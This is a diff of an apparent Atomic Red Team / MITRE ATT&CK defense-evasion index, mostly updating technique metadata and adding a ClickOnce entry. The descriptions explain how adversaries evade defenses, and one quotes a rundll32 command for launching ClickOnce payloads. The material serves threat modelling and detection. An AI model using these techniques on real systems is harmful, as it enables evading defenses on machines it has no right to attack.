         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -24124,8 +24273,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests:
     - name: Injection SID-History with mimikatz
@@ -24204,7 +24351,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -24223,7 +24370,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -24318,11 +24464,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -24402,11 +24547,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -24471,7 +24615,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests:
     - name: Regsvr32 local COM scriptlet execution
@@ -24647,7 +24790,7 @@ defense-evasion:
         name: command_prompt
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -24696,8 +24839,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -24712,9 +24855,8 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests:
     - name: Masquerading as Windows LSASS process
@@ -24893,7 +25035,7 @@ defense-evasion:
         elevation_required: true
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -24905,7 +25047,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -24935,13 +25077,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -25002,7 +25143,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests:
     - name: Execution of program.exe as service with unquoted service path
@@ -25086,11 +25226,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -25114,11 +25253,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -25143,9 +25281,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -25225,7 +25362,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -25259,7 +25395,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -25286,8 +25422,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests:
     - name: Regasm Uninstall Method Call Test
@@ -25461,7 +25595,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests:
     - name: Install root CA on CentOS/RHEL
@@ -25675,43 +25808,20 @@ defense-evasion:
         elevation_required: true
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -25720,9 +25830,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -25734,12 +25849,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests:
     - name: Compile After Delivery using csc.exe
@@ -25948,7 +26086,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -25974,12 +26112,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -26069,7 +26205,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests:
     - name: Bitsadmin Download (cmd)
@@ -26252,7 +26387,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests:
     - name: MSBuild Bypass Using Inline Tasks (C#)
@@ -26333,7 +26467,7 @@ defense-evasion:
         name: command_prompt
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -26375,10 +26509,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -26402,18 +26535,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -26427,7 +26572,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -26439,20 +26584,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -26461,11 +26597,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -26474,6 +26609,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -26483,6 +26619,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -26494,13 +26631,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -26545,9 +26682,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: AWS - CloudTrail Changes
@@ -27172,7 +27306,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests:
     - name: Hidden Window
@@ -27234,15 +27367,138 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
